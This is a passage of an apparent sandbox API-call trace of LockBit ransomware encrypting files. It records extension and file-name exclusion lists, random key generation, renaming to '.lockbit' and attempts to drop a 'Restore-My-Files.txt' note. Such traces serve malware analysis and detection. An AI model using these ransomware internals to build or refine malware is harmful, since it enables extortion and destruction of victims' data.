[0177.559] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.560] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.560] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00642_.WMF") returned -1 [0177.561] lstrcmpiW (lpString1="ntldr", lpString2="SY00642_.WMF") returned -1 [0177.561] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00642_.WMF") returned -1 [0177.561] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00642_.WMF") returned -1 [0177.561] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00642_.WMF") returned -1 [0177.561] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00642_.WMF") returned 1 [0177.561] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00642_.WMF") returned -1 [0177.561] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.561] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00642_.WMF") returned=".WMF" [0177.561] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.561] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.561] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.562] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.562] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00642_.WMF.lockbit") returned 72 [0177.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00642_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00642_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0177.563] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.563] malloc (_Size=0x40068) returned 0x3d70450 [0177.563] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1912) returned 1 [0177.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.564] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.564] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.564] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.564] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.567] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00642_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00642_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.567] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.567] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.568] free (_Block=0x1fa2ed8) [0177.569] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00642_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.569] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.569] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.569] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2094, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00788_.WMF", cAlternateFileName="")) returned 1 [0177.575] lstrcmpiW (lpString1=".", lpString2="SY00788_.WMF") returned -1 [0177.575] lstrcmpiW (lpString1="..", lpString2="SY00788_.WMF") returned -1 [0177.575] PathFindExtensionW (pszPath="SY00788_.WMF") returned=".WMF" [0177.575] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.575] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.576] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.576] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.577] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00788_.WMF") returned -1 [0177.578] lstrcmpiW (lpString1="ntldr", lpString2="SY00788_.WMF") returned -1 [0177.578] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00788_.WMF") returned -1 [0177.578] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00788_.WMF") returned -1 [0177.578] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00788_.WMF") returned -1 [0177.578] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00788_.WMF") returned 1 [0177.578] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00788_.WMF") returned -1 [0177.578] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.578] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00788_.WMF") returned=".WMF" [0177.578] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.578] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.578] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.579] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.579] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00788_.WMF.lockbit") returned 72 [0177.579] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00788_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00788_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0177.581] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.581] malloc (_Size=0x40068) returned 0x3f70048 [0177.581] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8340) returned 1 [0177.581] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0177.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0177.583] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0177.585] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00788_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00788_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.585] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.585] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.587] free (_Block=0x1fa2ed8) [0177.587] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00788_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.587] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.587] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2fdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00792_.WMF", cAlternateFileName="")) returned 1 [0177.587] lstrcmpiW (lpString1=".", lpString2="SY00792_.WMF") returned -1 [0177.587] lstrcmpiW (lpString1="..", lpString2="SY00792_.WMF") returned -1 [0177.587] PathFindExtensionW (pszPath="SY00792_.WMF") returned=".WMF" [0177.587] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.587] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.587] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.588] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.589] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.589] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00792_.WMF") returned -1 [0177.590] lstrcmpiW (lpString1="ntldr", lpString2="SY00792_.WMF") returned -1 [0177.590] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00792_.WMF") returned -1 [0177.590] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00792_.WMF") returned -1 [0177.590] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00792_.WMF") returned -1 [0177.590] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00792_.WMF") returned 1 [0177.590] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00792_.WMF") returned -1 [0177.590] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.590] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00792_.WMF") returned=".WMF" [0177.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.590] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.590] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.591] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.592] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.592] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.592] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.592] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.592] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.592] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00792_.WMF.lockbit") returned 72 [0177.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00792_.WMF" (normalized: 